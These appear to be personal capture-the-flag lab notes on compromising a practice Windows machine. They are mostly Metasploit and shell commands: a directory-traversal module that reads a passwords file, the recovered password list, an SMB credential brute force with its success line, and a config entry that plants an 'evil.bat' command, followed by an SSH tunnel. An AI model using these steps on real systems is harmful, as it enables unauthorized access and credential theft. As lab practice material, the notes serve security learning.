ftp 10.10.10.184
login anonymous
got two files, one from Nadine and another form Nathan

msfconsole search nvms

use auxiliary/scanner/http/tvt_nvms_traversal

set rhost 10.10.10.184
set filepath /Users/Nathan/Desktop/Passwords.txt
exploit

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

search smb_login
use scanner/smb/smb_login
set rhosts 10.10.10.184
set user_file users
set pass_file passwords
exploit

[+] 10.10.10.184:445      - 10.10.10.184:445 - Success: '.\Nadine:L1k3B1gBut7s@W0rk'

user :)

https://10.10.10.184:8443/index.html#
exploit -> https://www.exploit-db.com/exploits/46802

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

; Undocumented key
foobar = command = c:\temp\evil.bat

ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184


added new script but machine just dosn't work :(
